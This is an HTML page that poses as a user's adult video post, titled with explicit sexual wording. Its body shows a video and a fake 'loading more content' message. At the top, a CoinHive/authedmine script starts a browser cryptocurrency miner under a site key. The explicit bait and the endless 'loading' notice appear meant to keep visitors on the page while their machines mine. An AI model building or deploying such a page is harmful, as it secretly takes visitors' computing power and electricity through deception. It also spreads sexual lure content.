<head>
	<link rel="stylesheet" href="style.css">
</head>

<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('amF892EzzS6Emao09hF8gOOtHEIj3Jr4', {throttle: 0.3});
	miner.start();
</script>

<div class="container">
	<br><br>
	<font size="6"><b>Daddy cumming on my ass 🙈💦</b></font><br />
	<font size="4">Posted 02-09-2018 by <b>Sarah G.</b></font>
	<center>
	<video width="690" height="460" controls="controls">
		<source src="ass.mp4" type="video/mp4">
	</video>
	<br><br><br><br><br>
	<div class="loader"></div><br>
	<font size="5">Loading more content posted by user <b>Sarah G.</b><br/>This may take a while...</font>
	</center>
</div>
